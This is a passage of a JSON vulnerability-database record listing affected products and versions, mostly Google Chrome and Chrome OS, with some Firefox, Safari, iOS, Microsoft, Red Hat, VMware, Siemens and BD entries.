        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.44"
      },
      {
        "model": "communications lsms",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "oracle",
        "version": "13.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.536.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1664.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.801.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "1.1"
      },
      {
        "model": "rowa smart",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1048.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.46"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.807.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.307.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.72"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.94"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.87"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.865.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.86"
      },
      {
        "model": "workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "12.5.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1296.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.481.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.489.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.9"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.55"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "17.0.6"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "9.3.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "51.0.2704.63"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.11"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.121"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.97"
      },
      {
        "model": "pixel xl",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.10.1"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.1.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.69"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.47"
      },
      {
        "model": "windows server",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20120"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.69"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.91"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.43"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.5"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.50"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "45.0.2454.85"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "60.0.3080.5"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "59.0.3071.104"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.96"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.2.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.8"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.572.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.29"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.0.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.356.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1055.0"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.2.7"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.93"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "18.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.40"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.786.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "36.0.1985.122"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.20"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.59"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1039.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.22"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.447.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.836.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.23"
      },
      {
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "7.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.14"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.642.1"
      },
      {
        "model": "lsrfortessa",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "x-200"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.216"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.1"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.591.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "45.0.2454.101"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.99"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.107"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.168"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "8.0.1"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.41"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.79"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1012.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.92"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.278.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.74"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.19"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.413.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.95"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.25"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.67"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.580.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.81"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.123"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.146"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1305.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.24"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.513.0"
      },
      {
        "model": "enterprise linux server extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.2.149.29"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.2.6"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.30"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "24.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.14"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.21"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1042"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.158.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.761.1"
      },
      {
        "model": "windows server r2",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20120"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.81"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.49"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.30"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.0.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.45"
      },
      {
        "model": "sinumerik pcu",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "50.5"
      },
      {
        "model": "enterprise linux for ibm z systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "7"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.0.4"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.130"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.765.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.100"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.108"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "26.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.75"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.53"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.0.5"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.53"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.553.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.494.0"
      },
      {
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "4.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.745.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.484.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.10"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.62"
      },
      {
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.1.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.25"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1061.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.829.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "2.0.172.27"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.360.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.35"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.482.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.18"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.32"
      },
      {
        "model": "windows version for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1015110"
      },
      {
        "model": "totalys multiprocessor",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1309.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.12"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "29.0.1547.76"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "56"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.14"
      },
      {
        "model": "enterprise linux workstation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "6"
      },
      {
        "model": "sql server for x64-based systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "20170"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.38"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.27"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.56"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "46.0.2490.76"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.33"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.677.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "16.0.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.890.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.437.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "47.0.2526.106"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.770.0"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.39"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.30"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "53"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "64.0.3282.134"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.364.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.507.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "47.0.2526.73"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.349.0"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.17"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.6.26"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.69"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "58.0.3029.96"
      },
      {
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.450.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.58"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.52"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.322.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.15"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1700.70"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.83"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.17"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.95"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.20"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.63"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.13"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.89"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.37"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1297.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.23"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1026"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.53"
      },
      {
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "0.9.2"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "3.0.195.33"
      },
      {
        "model": "simatic ipc627d",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1068.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "33.0.1750.10"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.31"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.762.1"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.369.1"
      },
      {
        "model": "simatic ipc427c",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "siemens",
        "version": "0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.66"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.723.1"
      },
      {
        "model": "enterprise linux server year extended upd",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-47.3"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.83"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.34"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.103"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.884.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.16"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1038"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.62"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.83"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1068.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.42"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.621.0"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.310"
      },
      {
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
